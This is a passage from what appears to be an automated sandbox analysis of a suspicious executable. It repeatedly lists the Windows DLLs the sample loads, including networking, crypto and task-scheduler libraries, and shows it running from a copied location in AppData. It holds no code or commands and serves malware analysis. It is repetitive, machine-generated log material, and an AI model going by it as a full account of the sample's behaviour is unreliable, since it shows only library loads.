          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: drprov.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: ntlanman.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: davclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: davhlpr.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: browcli.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: drprov.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ntlanman.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: davclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: davhlpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: browcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: msimg32.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: dpapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: msimg32.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: dpapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: msimg32.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: winnsi.dll
